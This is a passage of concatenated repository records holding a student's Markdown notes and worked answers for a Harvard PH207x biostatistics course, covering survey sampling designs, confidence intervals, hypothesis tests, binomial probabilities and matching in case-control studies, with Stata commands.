Design.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Survey Design #\n> You decide to conduct a survey to measure physical activity in Boston. You plan to collect information on the amount of physical activity per week, history of diabetes, weight, height, age, and gender. \n> \n> There are seventeen distinct neighborhoods in Boston, with substantial differences in race/ethnicity, socioeconomic status, and population density. You expect to observe variability in physical activity indicators by neighborhood. Unfortunately there is no specific information about within-neighborhood heterogeneity (variance); therefore, you design the survey based on the assumption that variances of indicators are equal across neighborhoods. \n> \n>The table below displays population data for Boston in 2010. Assume that these population numbers are still accurate today.\n\n\tNeighborhood | Population - 2010\n\t----------------------- | ------------------\n\t South End | 34669\n\t Central | 30901\n\t Fenway - Kenmore | 40898\n\t South Boston | 33688\n\t Charlestown | 16439\n\t Allston - Brighton | 74997\n\t West Roxbury | 30445\n\t Roxbury | 59790\n\t East Boston | 40508\n\t Jamaica Plain | 39897\n\t Back Bay - Beacon Hill | 27476\n\t Hyde Park | 31813\n\t North Dorchester | 28384\n\t South Dorchester | 59949\n\t Roslindale | 32589\n\t Mattapan | 34616\n\t Harbor Islands | 535\n\t Boston | 617594\n\n> *Source: Boston Redevelopment Authority Research Division (2011). Boston 2010 Census Population: Planning District Comparison: http://www.bostonredevelopmentauthority.org/PDF/ResearchPublications//PDPercentChange.pdf*\n\n> Data which we need:\n* seventeen distinct neighborhoods\n\n\n#### 1. Consider the following questions ####\n> Suppose you decided to randomly sample 1,700 people from the city of Boston (call this Design 1). For any given individual in South Dorchester, what is the probability of being selected in the survey? What is this probability for an individual in Harbor Islands? \n> **Hint1:** How could be the probability of Harbor Island be equal to the one of South Rochester ? (groups of selection were previously specified) \n> **Hint2:** It should work f=n/N for: q1 (sample size 1700) \n> **Hint3:** If you have a sample size(n), and a population size in Boston(N), and you now the formula that n/N, they have equal chances to be selected\n\n> **Design 1:**\n\n\tgen weight_srs=617594/1700 \n\tgen fpc=1700/617594 \n\tdi fpc\n\n> => *fpc= 0.00275262*\n\n* South Dorchester: **0.00275262**\n* Harbor Islands: **0.00275262**\n\n\n#### 2. What is likely the main challenge of conducting this survey? ####\n> **Hint1:** This document helps: Advantages and disadvantages of simple random sampling: http://dissertation.laerd.com/simple-random-sampling.php#ad-dis\n\n* SRS is difficult to implement in practice \n* SRS does not necessarily sample people from each neighborhood \n\n#### 3. Now, you randomly sample 100 people within each neighborhood (Design 2). What is the probability of a random individual in South Dorchester being sampled? What is the probability of a randomly selected individual in Harbor Islands being sampled? ####\n> **Hint1:** It should work f=n/N for: q3 (sample size 100)\n\n> **Design 2:**\n\n\tgen fpc_south_dorchester=100/59949 \n\tgen fpc_harbor_islands=100/535 \n\n> => *fpc_south_dorchester= 0.00166808* \n> => *fpc_harbor_islands= 0.18691589* \n\n* South Dorchester: **0.00166808** \n* Harbor Islands: **0.18691589**\n\n#### 4. What kind of survey design is Design 2? ####\n* stratified sample \n* cluster sample \n* simple random sample \n\n#### 5. Consider an alternate design (Design 3). In each neighborhood the number of individuals sampled is proportional to the population size of the neighborhood. Assuming that the sample size is fixed at 1,700, would you expect Design 2 or Design 3 to provide more precise estimates of the physical activity indicators among Boston residents? ####\n> **Hint1:** You just need to think about the two designs. One is a sample where you randomly select 100 people from every neighbourhood. The other is a sample where the number selected is proportional to the size of the neighbourhood. So areas with a small population with have less people selected than a region with a large population.\n\n* Design 2\n* Design 3\n\n#### 6. For Design 3, consider the probability of a random individual in South Dorchester being sampled; and the probability of a random individual in Harbor Islands being sampled. These probabilities are approximately the same as the probabilities calculated using: ####\n\n* Design 1\n* Design 2\n\n#### 7. Why might you want to use Design 2 compared to Design 3? ####\n\n* to increase precision \n* if you wanted neighborhood-specific estimates \n* for both precision and neighborhood specific estimates \n\n#### 8. Next, you decide you do not want to visit all 17 neighborhoods, so you randomly sample 10 neighborhoods. Within each sampled neighborhood selected, you randomly sample 170 people. Call this Design 4. What is the probability of a random individual in South Dorchester being included in the survey? What is the probability of a random individual in Harbor Islands being included in the survey? ####\n> **Hint1:** Watch 7th video of Survey Data Analysis: Tutorial Survey data Analysis in STATA(continued)- first 5 minutes \n> **Hint2:** My suggestion is: make a table in excel with the data and do calculations over there is pretty straightforward to answer q8, q9 and q10\n> **Hint3:** It should work f=n/N for: q8 you randomly sample 10 neighborhoods out of 17 and multiply that by n/N (sample size 170)\n> **Hint4:** If you were a person in district x. What is the probability of your district being chosen. Then go on from there. \n\n> **See my calc file for the solution of question 8**\n\n* South Dorchester: **0.0016680845**\n* Harbor Islands: **0.1869158879**\n\n#### 9. A \"self-weighting\" design is a survey design for which every individual in the population has an equal probability of inclusion. Which survey designs are self-weighting (or approximately self-weighting)? ####\n\n* Designs 1 and 2 \n* => **Designs 1 and 3** - 1 ist constant as well as 2 and 4 are variable \n* Designs 2 and 3 \n* Designs 1 and 4 \n* Designs 2 and 4 \n\n#### 10. Consider yet another design (Design 5), in which you again select 10 neighborhoods. Now, the probability of a neighborhood being included in the survey is proportional to its population size. Within each sampled neighborhood, you randomly sample 170 people. Would you expect Design 4 or Design 5 to provide more precise estimates of the physical activity indicators among Boston residents? ####\n> **Hint1:** In Design 4, you randomly choose 10 districts out of 17, this means that all districts have the same probability of being chosen regardless of the size of their population. Design 5 is another story, the sampling of the districts is proportional to the size of their population, which means bigger districts are more likely to get chosen. \n\n* Design 4\n* Design 5 \n\n\n" }, { "alpha_fraction": 0.47623658180236816, "alphanum_fraction": 0.5601587295532227, "avg_line_length": 33.41999816894531, "blob_id": "e7bb64824119cfaac3e920167fbe5929547ddbe3", "content_id": "dcb17046f2c3058f3bd39588b546468ed7acbaac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 10514, "license_type": "no_license", "max_line_length": 521, "num_lines": 300, "path": "/PH207x/excercises/Lesson5/ Sampling Distributions.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Sampling Distributions \n## Central limit theorem\n\n> sd= σ/SQRT(n)\n> z= (x⁻ - μ) / sd\n\n> x⁻ >= 260 \n> z= 260-μ / ( σ/SQRT(25) )= 2.57\n\n\tdi 1-normal(2.57)\n\n> z= 0.00508483\n\n> So the probability of getting a sample mean of 260 or higher when taking a sample of 25 is about 0.5%\n\n## Sample Size \nHow big a sample do we need to be 95% sure that the sample mean for total cholesterol level is within +- 25mg/100ml of the population mean?\n\n> P_r{ -25 <= x⁻-μ <) 25 }= 0.95\n> P_r{ -25/(44.7/SQRT(n)) <= (x⁻-μ)/(44.7/SQRT(n) <= 25/(44.7/SQRT(n)) }= 0.95\n\n> => 25/(44.7/SQRT(n))= 1.96\n> => n=12.3 => n= 13\n\n> So, in general if we want to be 95% sure that the sample mean will be within +- delta of the population mean, then we need a sample of size\n\n> n= ( (1.96*σ) / delta )^2\n\n> where σ is the population standard deviation\n\n## Confidence Interval \nIs a 95% confidence interval for μ. In other words it is a rule that has a 95% chance of success - success being measured\n\n> σ is known\n\n> [ x⁻-1.96*σ/SQRT(n), x⁻+1.96*σ/SQRT(n), ]\n\n\n## Predictive vs. Confidence Interval \n\n> Z= (X-μ) / σ\n\n> So, [ μ-1.96*σ, μ+1.96*σ ] \n> is a predictive interval (95%) for X, just as \n>\t[ μ-1.96*σ/SQRT(n), μ+1.96*σ/SQRT(n), ]\n> is a predictive interval for x⁻, and \n>\t[ x⁻-1.96*σ/SQRT(n), x⁻+1.96*σ/SQRT(n), ]\n> is a confidence interval for μ\n\n\n## Width of Confidence Intervals \n\nLength | Formular | width\n------- | -------------------- | --------\n 95% | x⁻+-1.96*σ/SQRT(n) | 3.92*σ/SQRT(n)\n 99% | x⁻+-2.58*σ/SQRT(n) | 5.16*σ/SQRT(n)\n\nn | 95% CI for μ | Interval width\n------- | -------------------- | --------\n 10 | x⁻+-0.620*σ | 1.240*σ\n 100 | x⁻+-0.196*σ | 0.392*σ\n 1000 | x⁻+-0.062*σ | 0.124*σ\n\n> Smaller is σ, the tighter are the bounds - more homogeneous\n\n\n## Unknown variance: the t distribution - Student's T\nWhat if is σ is unknown\n\n> t= (x⁻-μ) / (s/sqrt(n)) \n> has n-1 degrees of freedom\n\n> **Sample**:\tsize n\n>\t\tsample mean x⁻\n>\t\tsample standard deviation s\n\n> **Population**:\tX is approx. normal\n>\t\tmean μ\n>\t\tstandard deviation σ\n\n\n## Questions to Confidence and Predictive Intervals ##\nAgain, let X denote BMI at baseline for a Framingham study participant. Assume X is normally distributed.\n\n\n#### Q1. Calculate a 90% predictive interval for X. ####\n> 90% is between -1.64 and +1.64 \n> [ x⁻-1.64*σ/SQRT(n), x⁻+1.64*σ/SQRT(n), ]\n\n\tset seed 2 \n\tsample 20, count \n\tsum bmi1\n\n\n Variable | Obs | Mean | Std. Dev. | Min | Max\n-------------|------------|------------|-------------|-----------|---------\n bmi1 | 4415 | 25.84616 | 4.101821 | 15.54 | 56.8\n\n>\tdi 25.84616 - 1.64*4.101821 \n>\tdi 25.84616 + 1.64*4.101821\n> => **[19.119174, 32.573146 ]**\n\n\n#### Q2. For a random sample of size 10, calculate a 90% predictive interval for the sample mean of X. ####\n> n= 10 \n\n>\tsample 10, count\n>\tset seed 2\n>\tsum bmi1\n\n Variable | Obs | Mean | Std. Dev. | Min | Max\n-------------|------------|------------|-------------|-----------|---------\n bmi1 | 4415 | 25.84616 | 4.101821 | 15.54 | 56.8\n\n\n>\tdi 25.84616 - invnormal(0.95)*4.101821/sqrt(10)\n>\tdi 25.84616 + invnormal(0.95)*4.101821/sqrt(10)\n> => **[23.712604, 27.979716]**\n\n\n#### Q3. For normally distributed random variables with known variance, the width of the 90% predictive interval for the sample mean is equal to the width of a 90% confidence interval for the population mean. ####\n> => **True**\n> False \n\n\tci bmi1, level(90)\n\n\n> Variable | Obs | Mean | Std. Err. | min [95% Conf. Interval] | max [95% Conf. Interval] \n> ------------|-------------|-----------|--------------|------------------------------|--------------------------\n> bmi1 | 20 | 25.0295 | .712055 | 23.79826 | 26.26074 \n\n\n## Introduction to Hypothesis Testing ##\n\n### Example ###\nWe know that total cholesterol levels in *our* Framingham population are distributed with mean μ = 237 mg/100ml and standard deviation σ = 44.7 mg/100ml.\n\n#### Q1. We have a sample of 49 total cholesterol levels and their average is x⁻= 230 mg/100ml?\n\n>\tsd= σ/sqrt(n)= 44.7/7= 6.3857143 \n> => So 230 is one standard error away from 237, and so the central limit theorem tells us that what we're talking about is quite possible.\n\n\n### Is it reasonable to assume that this is a sample from our population? ###\n> Use of 95% confidence interval to infer value of mean μ (μ=237) \n> [ x⁻ +- 1.96 σ/sqrt(n) -> x⁻ +- 1.96 47.7/sqrt(49) -> **x⁻ +- 13.356** \n> has a 95% chance of including μ.\n\n\nif x⁻ | 95% Conf. Interval | Include μ?\n------ | ------------------- | -----------------------------\n230 | [216.6, 243.4] | yes, depends on 243.4 > 237\n223 | [209.6, 236.4] | no, depends on 236.4 < 237\n215 | [201.6, 228.4] | no, depends on 228.4 < 237\n\n\n### Formalism of Hypothesis Testing ###\n\n* Propability of **Type I** error is **α** \ni.e. the probability of rejecting the null hypothesis when it is true\n\n* Propability of **Type II** error is **β** \ni.e. the probability of **not** rejecting the null hypothesis when it is true\n\n* **1-β** is the power of the test\n\n\n### Testing for the population mean: one vs. two-sided tests ###\n\n1. Hypothesize a value (μ_0)\n2. Take a random sample (n)\n3. Is it *likely* that the sample came from a population with mean μ_0 (α=0.05)? \nLook at (x⁻-μ_0)/σ and decide. One sided or two: Decide the difference between the sample mean and the hypothesized mean. Is it too large or not!\n\n\nNeed to set up 2 hypotheses to cover all possibilities for μ. Choose one of three possibilities:\n\nHypotheses | Formular\n----------- | ------------\n Two-side | H_0: μ = μ_0\n Two-side | H_A: μ != μ_0\n\nHypotheses | Formular\n----------- | ------------\n One-sided | H_0: μ >= μ_0\n One-sided | H_A: μ < μ_0\n\nHypotheses | Formular\n----------- | ------------\n One-sided | H_0: μ <= μ_0\n One-sided | H_A: μ > μ_0\n\n> H_0 - Null hypothesis \n> H_A - Alternative hypothesis\n\n\n### P-values and examples ###\nLook if the data are looking consonant. Look at z= (x⁻ - μ_0) / (σ/SQRT(n)) and reject H_0 if Z is too large, + or -.\n\nHypotheses | \n-------------- | \nH_0: μ = μ_0 | \nH_A: μ != μ_0 | \n\nExample: Reject if Z is > 1.96 or < -1.96, then Pr(reject H_0 when true) = α = 0.05\n\n#### Example ####\n\nHypotheses | \n-------------- | \nH_0: μ = 237 | \nH_A: μ != 237 | \n\n> μ_0= 237 mg/ml \n> σ= 47.7 mg/100ml \n> n= 49 non-hypertensives \n> x⁻= 221.9 mg/100ml\n\n> z= (x⁻ - μ_0) / (σ/SQRT(n))= (221.9 - 237) / (47.7/sqrt(49))= -2.2159329\n\n> => **-2.2159329 is less than 1.96** \n> => So we reject the null hypothesis\n\n#### P-value ####\nSome prefer to quote the p-value. The p-value answers the question: \"What is the probability of getting as large, or larger, a discrepancy?\" (μ- x⁻)\n\n> z= (x⁻ - μ_0) / (σ/SQRT(n))= (221.9 - 237) / (44.7/sqrt(49))= -2.3646532= -2.37\n> P_r( z>2.37 or z < -2.37 )= 2*P_r( z>2.37 )= 2*0.0222= 0.044\n\n\tdi normal( -2.0106348 )\n> => **0.02218202** \n> => 0.044 < 0.05, which means I would reject the null hypothesis\n\n> *Hint:* normal(z) returns the cumulative standard normal distribution, so you can **NOT** take di 1-normal(2.37). if you do that, you will get the probability to get a result smaller than 2.37 standard deviations above μ.\n\n\n## Example: Atherosclerosis and Physical Activity ##\n> Oxidation of components of LDL cholesterol (the bad cholesterol) can result in atherosclerosis, or hardening of the arteries. Elosua et. al (2002) examine the impact of a 16 week physical activity program on LDL resistance to oxidation in 17 healthy young adults. After completing the program, the average maximum oxidation rate in the study participants xˉ was 8.2 μmol/min/g, and the sample standard deviation of the maximum oxidation rate was s=2.5 μmol/min/g. Assume that the oxidation rate is normally distributed.\n\n### Continuous data ###\n\n population standard deviation | test type | how to \n------------------------------------ | ------------------ | ---------------------------------------------------------------------------------\nσ known, large n | One-sample Z-test | Central Limit Theorem (CLT) - Normal\nσ known, normally distributed data | One-sample Z-test | x⁻~N - Normal - Z-test based on the normal distribution - z= (x⁻-μ) / (σ/SQRT(n))\nσ unknown, normally distributed data | One-sample t-test | t-distribution - t= (x⁻-μ)/(s/SQRT(n)) - t~t_n-1\n\n\n* Suppose that the average maximum oxidation rate in the population of healthy young adults who did not complete the program was 11.3μmol/min/g, and the standard deviation was 2.3μmol/min/g.\n\n* Construct a 99% predictive interval for the sample mean maximum oxidation rate from a sample of size 17 (assuming normality).\n\n> σ= 2.3 \n> n= 17 \n> x⁻_0= 11.3 \n> \n> Y~N( 11.3, 2.3² ) \n> => μ +- z_0.995 * σ/SQRT(n)\n\n\tdi 11.3-invnormal(0.995)*2.3/sqrt(17) \n\tdi 11.3+invnormal(0.995)*2.3/sqrt(17)\n> => [ 9.8631201, 12.73688 ]\n\n* Construct a 99% confidence interval for the mean oxidation rate in healthy young adults after completing the physical activity program, using the sample of 17 participants.\n\n#### t-distribution ####\n> x⁻ +- t_17-1,0.995 * s/SQRT(n) \n> s= sample standard deviation \n\n\tcii 17 8.2 2.5, level(99)\n\n Variable | Obs | Mean | Std. Err. | min [99% Conf. Interval] | max [99% Conf. Interval]\n------------ | ------------ | ---------- | ------------ | ------------------------ | --------------------------\n | 17 | 8.2 | .6063391 | 6.429016 | 9.970984\n\n#### z-distribution ####\n> x⁻ +- z_0.995 * σ/SQRT(n) when σ is known \n> It's always: **Z_0.995 < t_17-1,0.995** \n> and: **σ < s**\n\n\n#### One-Sample t-test ####\n> s = sample standard deviation= 2.5 \n> μ_0 = hypothesized mean= 11.3 \n> sample mean= 8.2 \n> n= sample size= 17\n\nHypotheses | \n--------------------- | \nH_0: μ = μ_0 = 11.3 | \nH_A: μ != μ_0 = 11.3 | \n\n\tdb ttest\n\tttesti 17 8.2 2.5 11.3, level(99)\n\n\n> => **Pr(|T| > |t|) = 0.0001** \n> => **degrees of freedom = 16** \n> => **t= -5.1127** \n> => α= 0.01 => p<0.01 => **reject H_0**\n\n\n\n\n\n" }, { "alpha_fraction": 0.5851016044616699, "alphanum_fraction": 0.6898419857025146, "avg_line_length": 41.57692337036133, "blob_id": "a934973cb6eefc818b1ca38fc220f8f160be830d", "content_id": "94b29e7263cb5cba5fa3cec4de99f1239ec90edc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2215, "license_type": "no_license", "max_line_length": 401, "num_lines": 52, "path": "/PH207x/homework/four/Smoking and the binomial distribution.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Smoking and the binomial distribution\nAccording to data from the CDC in 2010, 19.3% of adults age eighteen and older smoke cigarettes. In the year 2008, the incidence rate of lung cancer was 65.1 cases per 100,000 people per year.\n\nSuppose you are conducting a lung cancer study in the United States, and you obtain a random sample of 2,000 adults (over 18 years of age) who do not have lung cancer. You plan to follow this study cohort over a period of 5 years and observe incident cases of lung cancer.\n\n## Smoking and the binomial distribution. \nSmoking status is an important predictor of lung cancer incidence. Therefore, as the study designer, it is important to think about baseline smoking rates in your study cohort. We first model the number of smokers in the study cohort using the binomial distribution, and assume that this cohort is representative sample from the US population. Use the binomial distribution to answer the parts below. \n\n * 2010: 19.3% of >18 years smoke cigarettes\n * 2008: 65.1/100,000 people= 0.0000655\n * p= prevalence= 0.193\n * n= sample size= 2000\n * observation: 5 years\n\n##### Q1. How many smokers would you expect to see in the study cohort, on average? #####\n\t \n>\tE(x)= n*p= ? \n\n\tdi 0.193*2000 \n\n>\t=> E(x)= **386**\n\n##### Q2. What is the standard deviation of the number of smokers in the study cohort? #####\n\t \n>\tsd(x)= sqrt(number of people*prevalence*(1-prevalance)) \n>\tsd(x)= SQRT( n*p*(1-p) )= SQRT( 2000*0.193*(1-0.193) ) \n\n>\t=> sd(x)= **17.6494192539**\n\n##### Q3. What is the probability that you observe exactly 386 smokers? #####\n\t \n>\tP(X=386)= binomialp(2000,386,0.193) \n\n\tdi binomialp(2000,386,0.193)\n\n>\t=> P( X = 386 )= **0.0225986**\n\n##### Q4. What is the probability that greater than or equal to 25% of the study population are smokers? Please round your answer to 4 decimal places. #####\n\t \n>\tP( X >= 500 )= binomialtail(2000,500,0.193) \n\n\tdi binomialtail(2000,500,0.193) \n\n>\t=> P( X >= 500 )= **0.0000000002403**\n\n##### Q5. What is the probability that less than or equal to 20% of the study population are smokers? #####\n\t \n>\tP( X <= 400 )= binomial(2000,400,0.193) \n\n\tdi binomial(2000,400,0.193) \n\n>\t=> P( X <= 400 )= **0.79487415**\n\n" }, { "alpha_fraction": 0.5526131987571716, "alphanum_fraction": 0.5961150527000427, "avg_line_length": 50.16865158081055, "blob_id": "fa2ee377c26195109138ae5dbbdea7067f0c911e", "content_id": "bce4cdb9c919c74a6f444f67316ce7bdb48fb41d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 25792, "license_type": "no_license", "max_line_length": 540, "num_lines": 504, "path": "/PH207x/excercises/Lesson10/Matching and Effect Modification.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Matching and Effect Modification #\n\n## Matching - Intro ##\n\n### Restriction ###\n* **Matching** restricts selection of some subjects to obtain a specified distribution of the matching factor\n* **Observational studies** (e.g. cohort studies): Typically restricts selection of the comparison group\n\t* **Cohort Study**: Non-exposed subjects selected to have similar distribution of as exposed subjects\n\t* **Case Control Study**: Controls selected to have similar distribution of as cases\n\n### Motivation for Matching: Avoid Confounding ###\n* **Matching alone avoids confounding in cohort studies (probided there is a fixed matching ratio)**\n* Matching alone does not necessarily avoid confounding in case-control studies\n\t* Still requires adjustment for the matching factor in the analysis\n\n### DAG with Confounding - Causal Diagram ###\n1. **Confounder -> Exposure**: Target of Matching in Cohort Studies \n-> So what matching does in a cohort study, it addresses the relationship\nbetween the potential confounder.\n2. **Confounder -> Outcome**: Target of Matching in Case Control Studies\n\t* And I said in a cohort study, matching blocks that relationship.\n\t* And it also has been independent risk factor for the outcome.\n3. **Exposure -> Outcome**:\n\n#### Why I want to have old people in my study? ####\nThe problem is there are two reasons, as I look at my cases and select their match controls matching by age, there are **two reasons I might see a lot of old people among my cases**. The two reasons are, \n* that if age is my potential confounder, and CHD-- coronary heart disease-- is my outcome, there are two potential mechanisms by which old people could end up being cases in your study.\n\t1. Old age itself influences the risk of having disease, so older people are going to be **more likely** to be your cases.\n\t2. But remember, old age might also be related to whether you smoke or you don't smoke. And smoking brings with it higher risk of getting heart disease.\n\n### Summary: Case Control Studies ###\n* Matching on a confounder in a case control study:\n\t- Builds **similar distributions** of confounder among the cases and controls\n\t- Builds similar distributions of any correlate of the confounder (e.g. exposure) among the cases and controls\n* Implication: Biases crude **odds ratio** towards its null value (1.0)\n\n## How to Perform Matching: Question##\nWhen performing matching in a case-control study:\n* => **Controls are selected to have a similar distribution of the matching factors as the cases.**\n* Non-exposed subjects are selected to have similar distribution of the matching factors as exposed subjects. \n* Cases are selected to represent the exposure distribution in the general population.\n* Controls are selected to have a similar distribution of the exposure as the cases. \n\n## Example of Matching ##\n\n### Example of confounding by sex in a large population ###\n* **A. Sex distribution among exposed and among non-exposed subjects in the source population** \n \n | Exposed | Non-Exposed\n-------- | ----------- | ------------\n Males | 8,000 (80%) | 8,000 (80%)\n Females | 2,000 (20%) | 2,000 (20%)\n Total | 10,000 | 10,000\n\n* **B. Exposure and sex-specific risks of outcome** \n \n | Exposed | Non-Exposed\n-------- | ------- | ------------\n Males | 0.06 | 0.02\n Females | 0.03 | 0.01\n\n* **C. Expected number of outcomes** \n \n | Exposed | Non-Exposed | Total\n-------- | ------- | ------------ | ------ \n Males | 480 | 40 | \n Females | 60 | 80 | \n Total | 540 | 120 | 660 Controls \n\nNow, remember a confounder has to have two relationships:\n1. It has to be in balance in the two groups you're comparing.\n2. But it also has to be an independent risk factor or at least a marker or a determinant of developing the disease.\n \n> So right now from these two characteristics, characteristic **A** and characteristic **B** on this slide, we can say that this particular factor of sex **should be a confounder**. It's satisfying the two criteria that confounder has to have.\n \n> **The risk changes from 2% to 6%**. So what's the right answer for the effect of the exposure? The risk ratio here is **3.0**. Regardless whether you're male or female, the exposure triples your risk.\n \n##### DAG with Sex - Causal Diagram #####\n\n1. **Sex -> Exposure**: ***80%***\n2. **Sex -> Disease**: ***Risk Ratio= 2%***\n3. **Exposure -> Disease**:\n\n\n* **D. Expected sex-specific data** \n \n | Males Outcome | | *Total* | Females Outcome | | *Total* \n------------ | ------------- | ----- | --------- | --------------- | ----- | --------- \n | **+** | **-** | | **+** | **-** | \n Exposed | 480 | 7520 | 8000 | 60 | 1940 | 2000 \n Non-Exposed | 40 | 1960 | 2000 | 80 | 7920 | 8000 \n Risk Ratio | | | 3.0 | | | 3.0 \n\n#### Conclusion ####\n* Sex appears to be a confounder\n\t- Associated with the exposure in the source population\n\t- Independent determinant of the outcome\n* RR_Crude=4.5 != RR_Adjusted=3.0\n\n\n### Example Matched (by sex) cohort study ###\n**Matched (by sex) cohort study** based on 1000 exposed subjects selected at random from the source population\n* **A. Sex distribution among exposed and among matched non-exposed subjects** \n \n | Exposed | Non-Exposed\n-------- | --------- | ------------\n Males | 800 (80%) | 800 (80%)\n Females | 200 (20%) | 200 (20%)\n Total | 1000 | 1000\n\n* **B. Exposure and sex-specific risks of outcome** \n \n | Exposed | Non-Exposed\n-------- | ------- | ------------\n Males | 0.06 | 0.02\n Females | 0.03 | 0.01\n\n* **C. Expected number of outcomes** \n \n | Exposed | Non-Exposed | Total\n-------- | ------- | ------------ | ------ \n Males | 48 | 16 | \n Females | 6 | 2 | \n Total | 54 | 18 | 72 \n\n* **D. Expected sex-specific data** \n \n | Males Outcome | | *Total* | Females Outcome | | *Total* \n------------ | ------------- | ----- | --------- | --------------- | ----- | --------- \n | **+** | **-** | | **+** | **-** | \n Exposed | 48 | 752 | 800 | 6 | 194 | 200 \n Non-Exposed | 16 | 784 | 800 | 2 | 198 | 200 \n Risk Ratio | | | 3.0 | | | 3.0 \n\n* **E. Expected crude data** \n \n | Outcome | | *Total* \n------------ | ------------- | ----- | --------- \n | **+** | **-** | \n Exposed | 54 | 946 | 1000 \n Non-Exposed | 18 | 982 | 1000 \n Risk Ratio | | | 3.0 \n\n\n#### Conclusion for cohort study ####\n* I no longer have a relationship in my data set between sex and exposure (between sex and smoking). Therefore, **sex should not be a confounder**.\n* RR_Crude=RR_Adjusted=3.0\n* Matching on Sex avoids confounding\n\n\n### Example Matched (by sex) case control study ###\n**Matched (by sex) cohort study** based on all 660 outcome cases that developed from the source population\n* **A. Sex distribution among exposed and among matched controls** \n \n | Cases | Control\n-------- | --------- | ------------\n Males | 520 (79%) | 520 (79%)\n Females | 140 (21%) | 140 (21%)\n Total | 660 | 660\n\n* **B. Exposure and sex-specific risks of outcome** \n\t- **Cases (Panel C for source population):** \n \n | Exposed | Non-Exposed | Total\n-------- | --------- | ------------ | ------\n Males | 480 (92%) | 40 (8%) | 520 \n Females | 60 (43%) | 80 (57%) | 140 \n Total | 540 (82%) | 120 (18%) | 660 \n\n\t- **Control (Panel A for source population):** \n \n | Exposed | Non-Exposed | Total\n-------- | --------- | ------------ | ------\n Males | 416 (80%) | 104 (20%) | 520 \n Females | 28 (20%) | 112 (80%) | 140 \n Total | 444 (67%) | 216 (33%) | 660 \n\n* **C. Expected sex-specific data** \n \n | Males Exposure | | *Total* | Females Exposure | | *Total* \n------------ | -------------- | ----- | --------- | ---------------- | ----- | --------- \n | **+** | **-** | | **+** | **-** | \n Exposed | 480 | 40 | 520 | 60 | 80 | 140 \n Non-Exposed | 416 | 104 | 520 | 28 | 112 | 140 \n Odd Ratio | | | 3.0 | | | 3.0 \n\n* **D. Expected crude data** \n \n | Outcome | | *Total* \n------------ | ------------- | ----- | --------- \n | **+** | **-** | \n Exposed | 540 | 120 | 660 \n Non-Exposed | 444 | 216 | 660 \n Odd Ratio | | | 2.2 \n\nOdd Ratio is less than 3.0. It's under estimating the true effect. That's the implications of matching in this case by sex which is a strong correlate of your exposure.\n\n#### Conclusion ####\n* Matching by sex alone did not avoid confounding\n* **Adjusted analysis is still required**\n* Problem: two reasons for high prevalence of male sex among cases\n\t- Sex is a risk factor\n\t- Exposure a risk factor and sex associated with exposure\n\n\n## Matching - Efficiency ##\nIn the last lecture I try to make a distinction of the implications of **matching in a cohort study versus matching a case control study**. I said the good news is, matching in a cohort study with equal numbers of non-exposed being matched to each exposed person **avoids confounding**.\n\n#####Q: Why would people want to do a match design when you're doing a case control study?#####\n* Because either way you have to control for the factor. If it's a true confounder and you didn't match on it, you're going to have to control for it the analysis.\n* You get a more efficient analysis. You have more power for when you do your tests of significance, or your confidence intervals will be now narrower when you report your confidence intervals around your odds ratios.\n\n### Matching and Efficiency in Case Control Study ###\n* Not machting on a confounder -> **varying case/control ratios across strata**\n* Matching on a confounder -> **constant case/control ratios across strata**\n* **Matched analysis tends to be more efficient than *stratified analysis* of unmatched data**\n\nAnd I'm going to measure **odds ratios** in each of these tables, and use **Mantel-Haenszel's formula** to get the adjusted value, because I'm assuming **age is a confounder**.\n\n## Results of Matching - Question ##\nMatching in a case-control study:\n* => **A. Results in narrower confidence intervals than would have been obtained if one did not conduct a matched study.**\n* B. Provides an unbiased estimate of the association even without accounting for the matching in the analysis. \n* C. Limits the potential for recall bias. \n* D. Choices A and B\n\n## Matching - Analysis ##\nVideo: https://s3.amazonaws.com/edx-course-videos/harvard-ph270x/H-PH207X-FA12-L10-11_001.mp4 \n \nBasic prinziple: Perform analysis within each matched group and then pool to obtain a summary average \n \nTypical format for results from a case control study involving\n* 1-1 matching on a single factor. \n \n | Exposure + | Status of Control - \n--------------- | ----------- | -------------------- \n Exposure | + A | **B** \n Status of Case | **- C** | D \n\nThe information about whether exposure is related to being a case, being a control, is really limited to the matched groups where the case and the control are called **discordant with** respect to exposure. (-C AND B) \n-> So for example, capital **B** were the number of matched groups where the case was a smoker and the control was not, and capital **C** were the number of matched groups where the control was a smoker and the case was not. The relative sizes of B and D are going to tell you whether smokers are more likely to be cases than to be controls.\n\n### Odds Ratio Estimation ###\nAnd in biostatistics, you learn that the way you estimate an odds ratio linking ***exposure to disease*** from case control studies that are matched of the form we were just looking at is you divide the number of matched groups where the ***case is a smoker and the control is not***, capital B. You ***divide*** that ***by capital C***, the number of matched groups where the ***control was a smoker and the case was not***. That ratio estimates the odds ratio for developing -- for being a case of disease comparing smokers to nonsmokers.\n\n```math\n\tOR=B/C\n```\n> Identical to the Mantel-Haenszel estimate for the odds ratio with each matched pair as a separate stratum\n\n#### Example: Predictors of Low Birth Weight Babies ####\n* Case Control Study\n* **56 cases** (infants born with low birth weight)\n* **56 controls** matched by **age of the mother**\n* **Exposure: Maternal smoking during pregnancy**\n\n##### Matched Analysis #####\n \n | Exposure + | Status of Control - \n--------------- | ----------- | -------------------- \n Exposure | + 8 | **22** \n Status of Case | **- 8** | 18 \n\n```math\n\tOR=22/8=2.75\n```\n\n##### Stratified Analysis #####\nWe need **8** ***two by two tables*** \n \n###### Now, remember what Mantel-Haenszel's formula does: ######\n**It says, for an odds ratio, take the value, A, and multiply it by the value, D, and divide it by the grand number, T. That goes into the formula in the numerator of the Mantel-Haenszel estimate.** \n \n | Exposure + | Status of Control - \n--------------- | ----------- | -------------------- \n Exposure | + A | **B** \n Status of Case | **- C** | D \n\n**Well, in the first case of the following table:**\n* A is 1, \n* D is 0\n* T is 2\n* ***So it's going to be A*D/T=1*(0)/2***\n \n | Strata D+ | Strata D- | Frequency | AD/T | BC/T | SUM AD/T | SUM BC/T \n---------- | --------- | --------- | --------- | ------- | ------- | ---------- | -------- \n E+ | 1 | 1 | 8 | 0 | 0 